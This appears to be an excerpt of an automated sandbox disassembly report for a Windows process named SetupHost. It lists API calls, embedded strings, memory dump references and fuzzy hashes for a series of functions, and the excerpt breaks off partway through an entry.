                                                                                                                                                                                                                • Instruction Fuzzy Hash: D431EFB1A407069FCF109F99CA846AEBBF7FF94304F25CA5AC451AB300DB719A54CB42
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000001,?), ref: 00A0A36D
                                                                                                                                                                                                                  • Part of subcall function 009BE595: _vsnwprintf.MSVCRT ref: 009BE5C7
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32 ref: 00A0A3EF
                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32 ref: 00A0A41F
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A0A43B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$CloseFileOpenSystemValue_vsnwprintf
                                                                                                                                                                                                                • String ID: %ls\%ls\%ls$RefreshAfter
                                                                                                                                                                                                                • API String ID: 3920268704-4261152845
                                                                                                                                                                                                                • Opcode ID: 07e0f0fd59694f71334f620e3bd04ba67addd81add0efbdf25c7c7dc6c34739e
                                                                                                                                                                                                                • Instruction ID: 34f3e344328479c277556864e917697d894c6b15fb9e800a7a28c4587c1a8901
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07e0f0fd59694f71334f620e3bd04ba67addd81add0efbdf25c7c7dc6c34739e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB3159B6D4122DABCB20DF54DD89ADAF7B8FB58710F0041A6A909E7240D6709E458FE1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009C8082: GetProcessHeap.KERNEL32(00000000,00000020,00000000,?,009C6DB8,?,?,?,?,?,?,?,?,?,?,009C71A8), ref: 009C808D
                                                                                                                                                                                                                  • Part of subcall function 009C8082: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,009C71A8,00002008,?,?,00000000), ref: 009C8094
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000050,?,?,?,?,?,?,?,?,?,?,009C7153,00002008,?,?), ref: 009C6BF0
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,009C7153,00002008,?,?,00000000), ref: 009C6BF7
                                                                                                                                                                                                                • memset.MSVCRT ref: 009C6C0B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CMicrodomUpdateContext::CreateVirtualComment, xrefs: 009C6C5A
                                                                                                                                                                                                                • NewChild->Comment.Allocate(), xrefs: 009C6C43
                                                                                                                                                                                                                • onecore\base\xml\udom_modify.cpp, xrefs: 009C6C4F
                                                                                                                                                                                                                • NewChild.Allocate(), xrefs: 009C6BE4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess$memset
                                                                                                                                                                                                                • String ID: CMicrodomUpdateContext::CreateVirtualComment$NewChild->Comment.Allocate()$NewChild.Allocate()$onecore\base\xml\udom_modify.cpp
                                                                                                                                                                                                                • API String ID: 1036512422-3993810698
                                                                                                                                                                                                                • Opcode ID: 8539d7a8dc117cd8981f84a7d15fa9e0e67818147284521e92d849a40f3038ac
                                                                                                                                                                                                                • Instruction ID: 261864cf15941fc5539f909b72422d45d9a20713ec9256acfd282e33e77a4482
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8539d7a8dc117cd8981f84a7d15fa9e0e67818147284521e92d849a40f3038ac
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4318DB1D407069BC724CF5AC980AAAFBF8FF98314B24842ED59697751D7709502CF91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000020,00000000,00000000,00000000,00000004,00000014,00000000,00000000,009DE93C,?,?,00000000,00000000), ref: 009C726F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,009DF26B), ref: 009C7276
                                                                                                                                                                                                                  • Part of subcall function 009C7DD3: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,009C7358,00000000), ref: 009C7E22
                                                                                                                                                                                                                  • Part of subcall function 009C7DD3: HeapFree.KERNEL32(00000000), ref: 009C7E29
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                • String ID: NewContext.Allocate()$Not-null check failed: UpdateContext$SourceMicrodom != 0$Windows::uDom::Rtl::RtlCreateMicrodomUpdateContext$onecore\base\xml\udom_modify.cpp
                                                                                                                                                                                                                • API String ID: 756756679-3807835623
                                                                                                                                                                                                                • Opcode ID: 22ae7decb1383d6d0f89c48553775c0ae99af48738eb80c9959395a287435f42
                                                                                                                                                                                                                • Instruction ID: bd2f897c249558e4475a2c94cdd1debafa39082ae6ce556cbdd61d15a49c8e0f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22ae7decb1383d6d0f89c48553775c0ae99af48738eb80c9959395a287435f42
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA218CB190D7128BC721DF989444B5BFAE8BB98710F11492DF86997341D774CA088FA7
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFinalPathNameByHandleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,009BED62), ref: 009BEBD1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000001,?,009BED62), ref: 009BEBE4
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009BED62), ref: 009BEBEB
                                                                                                                                                                                                                • GetFinalPathNameByHandleW.KERNEL32(?,00000000,009BED62,00000000,?,009BED62), ref: 009BEBFF
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009BED62), ref: 009BEC09
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,009BED62), ref: 009BEC12
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,00000000,00000000,?,009BED62), ref: 009BEC23
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$FinalHandleHeapNamePath$AllocProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3063401709-0
                                                                                                                                                                                                                • Opcode ID: ef2cdcd9039725689e6b77324bcc3a906db7ea873ac2169659c6ad6ec80481da
                                                                                                                                                                                                                • Instruction ID: d797dc701b350d6da2b13ce8f0fdb5f08b9573b44c5063ce047ac3d0081f7ad0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef2cdcd9039725689e6b77324bcc3a906db7ea873ac2169659c6ad6ec80481da
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B11C4716483206BD6218BFA9E0DFFB2E6DEF89B70F149A10F952D6294D570CC42A260
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 009E0329
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009E034A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009E0362
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E0369
                                                                                                                                                                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 009E03AB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalHeapSection$EnterFreeLeaveProcessReleaseSemaphore
                                                                                                                                                                                                                • String ID: DequeueWimData
                                                                                                                                                                                                                • API String ID: 3013838341-1001850157
                                                                                                                                                                                                                • Opcode ID: d0d97a03b68192a602fed8eb70d0a8710ac65bd6409bba71ad234afd87c03da3
                                                                                                                                                                                                                • Instruction ID: 8c00daa6355f4e6c6e1e108f0bbd7d922c36750c7f813f5cf81047ca139bcfdb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0d97a03b68192a602fed8eb70d0a8710ac65bd6409bba71ad234afd87c03da3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14113A71600215ABDB12DFAADD88B9EBBB9EF84750F109065B909D7260D7B0DD41CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000008,?,00000000,?,00000001,00000001,?,00A0C0C2,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00A0BBC8
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00A0C0C2,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000001,00000000,00000000), ref: 00A0BBCF
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,-00000001,?,00A0C0C2,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000001,00000000,00000000), ref: 00A0BC00
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00A0C0C2,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000001,00000000,00000000), ref: 00A0BC07
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000001,00000000,00000000,?,?,?,?,00A09637), ref: 00A0BC40
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A0BC47
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1864747095-0
                                                                                                                                                                                                                • Opcode ID: 0bec7a03550a144be0da2b0b4f64ec3b589b03b0f13cf5d15c4bde0bfc80408d
                                                                                                                                                                                                                • Instruction ID: 8d969694df9727e42c7f34a386c65065d9369b1e66ee87c80f2182cba16f03ba
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bec7a03550a144be0da2b0b4f64ec3b589b03b0f13cf5d15c4bde0bfc80408d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F11017A500308ABD711CFA8DD08AAFBAB9EB89750B15802DF906C7350DB758D0287B0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • onecore\base\lstring\lblob.cpp, xrefs: 009DC2D8
                                                                                                                                                                                                                • Not-null check failed: Source, xrefs: 009DC318
                                                                                                                                                                                                                • ::RtlIsLBlobValid(Destination), xrefs: 009DC304
                                                                                                                                                                                                                • Not-null check failed: Destination, xrefs: 009DC2C8
                                                                                                                                                                                                                • RtlAppendLBlobToLBlob, xrefs: 009DC2DF
                                                                                                                                                                                                                • ::RtlIsLBlobValid(Source), xrefs: 009DC333
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: ::RtlIsLBlobValid(Destination)$::RtlIsLBlobValid(Source)$Not-null check failed: Destination$Not-null check failed: Source$RtlAppendLBlobToLBlob$onecore\base\lstring\lblob.cpp
                                                                                                                                                                                                                • API String ID: 3510742995-2103971228
                                                                                                                                                                                                                • Opcode ID: b8c68d4dcd8c45fe7f336f37de73786b520878ceca525db8be7a8cc7fe14b84c
                                                                                                                                                                                                                • Instruction ID: f7b73b4e9c15978fba0bbc012336169090652671599fdf8e81b2dab30f232775
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8c68d4dcd8c45fe7f336f37de73786b520878ceca525db8be7a8cc7fe14b84c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43219DB1A4130A9BDF10DFC88544A9EBBB9AB91308F26C85AD4116B301D7B48E04DB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • onecore\base\lstring\lutf8_string.cpp, xrefs: 009DAB07
                                                                                                                                                                                                                • ::RtlIsLUtf8StringValid(Source), xrefs: 009DAB62
                                                                                                                                                                                                                • Not-null check failed: Source, xrefs: 009DAB47
                                                                                                                                                                                                                • RtlAppendLUtf8StringToLUtf8String, xrefs: 009DAB0E
                                                                                                                                                                                                                • ::RtlIsLUtf8StringValid(Destination), xrefs: 009DAB33
                                                                                                                                                                                                                • Not-null check failed: Destination, xrefs: 009DAAF7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: ::RtlIsLUtf8StringValid(Destination)$::RtlIsLUtf8StringValid(Source)$Not-null check failed: Destination$Not-null check failed: Source$RtlAppendLUtf8StringToLUtf8String$onecore\base\lstring\lutf8_string.cpp
                                                                                                                                                                                                                • API String ID: 3510742995-1886232254
                                                                                                                                                                                                                • Opcode ID: 4ae7503e1d379f24276cb705ab4f4052b9ab728adcdcf0da085c5c766d4fda68
                                                                                                                                                                                                                • Instruction ID: 4efc0ad982ceea899f63eef2128b193ac88e1be57d312b3b143af655db0a538f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ae7503e1d379f24276cb705ab4f4052b9ab728adcdcf0da085c5c766d4fda68
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1421A5B1940705ABDF20DFD9D9886AEB7F5AF90308F21C45BD4016B340D7B88D55CB51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,?,009BEA4C,?,00000000), ref: 009BEA91
                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009BEA4C,?,00000000), ref: 009BEA9F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,?,009BEA4C,?,00000000), ref: 009BEAB1
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009BEA4C,?,00000000), ref: 009BEAB8
                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,009BEA4C,00000000,00000000,?,009BEA4C,?,00000000), ref: 009BEACA
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009BEA4C,?,00000000), ref: 009BEAD4
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,009BEA4C,?,00000000), ref: 009BEADD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$FullHeapNamePath$AllocProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2171788232-0
                                                                                                                                                                                                                • Opcode ID: 25e3581aa8ee1c786c43f4f2a4d4a72f7e0c561fcba035866097499f121ec18e
                                                                                                                                                                                                                • Instruction ID: b76055df4eb3903713f5fa0960faa2c798b79f907e71e7a19d4a9421dc019276
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25e3581aa8ee1c786c43f4f2a4d4a72f7e0c561fcba035866097499f121ec18e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7011D76604311BBD7119BF69D0CAEF7EBDEB897B17149424F909D2250EA70C80296B1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • fclose.MSVCRT ref: 00A07A38
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A07A13), ref: 00A07A53
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A07A5A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A07A13), ref: 00A07A66
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A07A6D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A07A13), ref: 00A07A7C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A07A83
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$fclose
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 916384275-0
                                                                                                                                                                                                                • Opcode ID: 803d85b846d25c37b3aa83395778a234dd4be80dc9debe1c2e88b218c597e82a
                                                                                                                                                                                                                • Instruction ID: afdcd6676d0c8a70b8c5181239ccb3600160f623859edbe338be3c647c0019ee
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 803d85b846d25c37b3aa83395778a234dd4be80dc9debe1c2e88b218c597e82a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F06771F08219ABDB10DBE1ED8CABF7A7CAB55781B049058F505A2190CB34A902DA60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(ntdll.dll,00000000,00000800,00000001,00A0AFA2,00000000,00000001,00000001), ref: 00A0AAA3
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlIsStateSeparationEnabled), ref: 00A0AAB3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • ntdll.dll, xrefs: 00A0AA9E
                                                                                                                                                                                                                • RtlIsStateSeparationEnabled, xrefs: 00A0AAAD
                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection, xrefs: 00A0AAD2
                                                                                                                                                                                                                • OSDATA\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection, xrefs: 00A0AACB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                • String ID: OSDATA\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection$RtlIsStateSeparationEnabled$Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection$ntdll.dll
                                                                                                                                                                                                                • API String ID: 2574300362-100155017
                                                                                                                                                                                                                • Opcode ID: 2e13e533b1d2fead6db2167f87e8108cb358843b4842827a267df72c4b498c9a
                                                                                                                                                                                                                • Instruction ID: f9d0559a0da97cbb2df17a41e5047d3b3efbb86c0496ff45dbdc92de5917b1f4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e13e533b1d2fead6db2167f87e8108cb358843b4842827a267df72c4b498c9a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6E0C231746328A7CF3117687D0DBDE1A54DBA0F99F119120B882A72D4CA50CC07C6A6
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00A070A4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A070B9
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A070C0
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00A070D5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A070E2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A070E9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A071BD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A071C4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ByteCharFreeMultiWide$Alloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 741470664-0
                                                                                                                                                                                                                • Opcode ID: 575c0f3c59bef4ca2d21ca3d2ab2c71498920e797a2a779db0d747df392f5aea
                                                                                                                                                                                                                • Instruction ID: a316946afb1299281a89ff4622a7df1cb8ad3e131d38f6708fad614ac45e2719
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 575c0f3c59bef4ca2d21ca3d2ab2c71498920e797a2a779db0d747df392f5aea
